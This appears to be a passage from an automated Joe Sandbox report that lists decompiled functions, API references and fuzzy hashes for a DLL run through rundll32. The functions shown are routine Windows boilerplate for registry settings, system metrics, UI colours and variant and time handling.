Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32(?,0000102D,?,-00000044), ref: 1001D670

ShowWindow.USER32(00000000), ref: 10006987
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 100069CF
EnumWindows.USER32(Function_00006560), ref: 100069D7
SendMessageA.USER32(?,00001030,00000000,00000000), ref: 100069ED

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$EnumH_prologShowWindowWindows
String ID:
API String ID: 1436300307-0
Opcode ID: 468f98660c5c26ad090c803682146e80f89e7c37594ee229ae0a6e03a35df727
Instruction ID: 8aa6dd810ea5f8fce897b46c54bbca1794302c4b2e7c65cab8bb62aa74441820
Opcode Fuzzy Hash: 468f98660c5c26ad090c803682146e80f89e7c37594ee229ae0a6e03a35df727
Instruction Fuzzy Hash: 9B2108B5A417016BF320D779CC86F97B7ADEBC8B60F204508F2599B1D1C6B0F801C664

Uniqueness

Uniqueness Score: -1.00%

Function 100280DA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100280DA(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x100280f5
0x100280fc
0x100280ff
0x10028102
0x10028105
0x10028110
0x10028147
0x10028147
0x10028152
0x10028157
0x10028157
0x1002815c
0x10028161
0x10028161
0x1002816a

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 10028108
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 1002812B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 10028147
RegCloseKey.ADVAPI32(?,?,00000000), ref: 10028157
RegCloseKey.ADVAPI32(?,?,00000000), ref: 10028161

Strings

software, xrefs: 100280F0

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 79040a043cc2ebdfb0515227849aabbb19742b9991881b166ebfcf46e16d830a
Instruction ID: c072ce9508b34948441c9f22deec9e648e56c65b8eed7af3098084c238aca19d
Opcode Fuzzy Hash: 79040a043cc2ebdfb0515227849aabbb19742b9991881b166ebfcf46e16d830a
Instruction Fuzzy Hash: 5111F876D01159FBDB11DB9ADC88DDFBFBCEF85740B5000AAF514A2121D3709A15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000818F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000818F(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E10007FDE() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100399e0(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 100081CD
GetSystemMetrics.USER32 ref: 100081E5
GetSystemMetrics.USER32 ref: 100081EC
lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10008212

Strings

DISPLAY, xrefs: 10008209
B, xrefs: 100081AC

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpyn
String ID: B$DISPLAY
API String ID: 2307409384-3316187204
Opcode ID: 6c50faab95cb92ec3f3272489f88efe4b5cf7cc8fb105345147f78cfb5ff8d5e
Instruction ID: 54391ecb7454ccaf13049b9eab499f0b814914f08b1d1b4d5a1f3df2c47cf0c0
Opcode Fuzzy Hash: 6c50faab95cb92ec3f3272489f88efe4b5cf7cc8fb105345147f78cfb5ff8d5e
Instruction Fuzzy Hash: 3B117371941624ABEF11DF64CCC8A5B7BA8FF157D1B614061FD45AE10AD271DA01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 100232C9 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100232C9(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x100232d3
0x100232d9
0x100232e0
0x100232e7
0x100232ee
0x100232fb
0x10023302
0x10023305
0x10023308
0x1002330c

APIs

GetSysColor.USER32(0000000F), ref: 100232D5
GetSysColor.USER32(00000010), ref: 100232DC
GetSysColor.USER32(00000014), ref: 100232E3
GetSysColor.USER32(00000012), ref: 100232EA
GetSysColor.USER32(00000006), ref: 100232F1
GetSysColorBrush.USER32(0000000F), ref: 100232FE
GetSysColorBrush.USER32(00000006), ref: 10023305

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: f3e3b59a713c405bc6e38702beddc650d18277c88bf38d22c0b8d84aad097ebc
Instruction ID: a9fcd8c3fbdef543b70b14635b9beb864552892ae8318635e4161e8aa83ef266
Opcode Fuzzy Hash: f3e3b59a713c405bc6e38702beddc650d18277c88bf38d22c0b8d84aad097ebc
Instruction Fuzzy Hash: D4F012719407485BD730BFB24D49B47BAD1FFC4B10F12092ED2418B990D6B5E441DF40

Uniqueness

Uniqueness Score: -1.00%

Function 1002686F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002686F() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1003a0f0 =  *0x1003a0f0 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x1003a0f0 = _t6;
					return _t6;
				}
			}

0x10026880
0x1002688a
0x1002688e
0x100268aa
0x100268aa
0x00000000
0x100268aa
0x10026890
0x10026896
0x00000000
0x00000000
0x00000000
0x10026898
0x10026898
0x1002689d
0x100268a3
0x00000000
0x100268a3

APIs

GetVersion.KERNEL32 ref: 10026877
GetVersion.KERNEL32 ref: 10026882
GetVersion.KERNEL32 ref: 1002688A
GetVersion.KERNEL32 ref: 10026890
RegisterClipboardFormatA.USER32 ref: 1002689D

Strings

MSWHEEL_ROLLMSG, xrefs: 10026898

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 3227b10484f3ef1638ed66b77773593540a1c6792568f525d42f08afe9ffef64
Instruction ID: adb2e3465f30afb568f49f00b276de175ff8a6773755a27906a83befc949cf32
Opcode Fuzzy Hash: 3227b10484f3ef1638ed66b77773593540a1c6792568f525d42f08afe9ffef64
Instruction Fuzzy Hash: DAE04F3A8106275AE611B7A4AC4076826D8EB8D395FE20127CD0196164EF3408838AA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000F0B5 Relevance: 9.4, APIs: 6, Instructions: 384
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000F0B5(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E10011A8C(E1002AD75, _t327);
				_t155 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E1001064A(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E1000CCB8( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B9B7(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E1001065D( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E1000CA36(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x1002dcd0;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E10010630(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E1000CA60(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E1000B8EE(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E10010630(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E1000CA60(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E1000B94F( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E10010630(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E1000CA8A(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E1000CC20(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E10010630(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E100072DF(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E1001067D(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E10010630(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E10010579(_t327 - 0x100,  *((short*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E10010630(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E1001065D(_t327 - 0xf0, E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E10010630(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E10010630(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E1000EB21(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E1001067D(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E10010630(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E10002EB0(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E10010579(_t327 - 0x110,  *((short*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E10010630(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E100105A0(_t327 - 0xe0,  *((intOrPtr*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E10010630(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E10010630(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E10010630(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E10010630(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E10010630(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E1001065D( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E10011A49( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 1000F0BA
VariantClear.OLEAUT32(?), ref: 1000F11C
VariantClear.OLEAUT32(00000007), ref: 1000F44A
VariantClear.OLEAUT32(?), ref: 1000F5BF

Part of subcall function 10010630: VariantCopy.OLEAUT32(?,?), ref: 10010638

Part of subcall function 1000B8EE: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B93C

VariantClear.OLEAUT32(?), ref: 1000F59F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$Clear$Time$CopyH_prologSystem
String ID:
API String ID: 2075586698-0
Opcode ID: 5ad6e99bdd1103fbad408b9738d1ce61ad1611e6fc0cf40d72984165b5fd7b9b
Instruction ID: 2707228918a994c6141f3d21d61e54e91ac0ab41dc8e662946a9f497bcd99bd1
Opcode Fuzzy Hash: 5ad6e99bdd1103fbad408b9738d1ce61ad1611e6fc0cf40d72984165b5fd7b9b
Instruction Fuzzy Hash: CAE16B3490055CEAEF15DF90C891AFEBBB9FF49380F00408AF945A7185DB74AE48EB61

Uniqueness

Uniqueness Score: -1.00%

Function 10013747 Relevance: 9.2, APIs: 6, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10013747(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E1001974B(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018F3F(_t121);
							__eflags =  *0x10037b6c; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x10037b68; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E100197E0(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013440(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E100197E0(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013440(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E100197E0(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013440(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019797(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x10037b70; // 0xfffff1f0
							_t86 =  *0x10037b68; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x10037b68; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018F3F( &_v12);
							_t138 =  *0x10037b6c; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
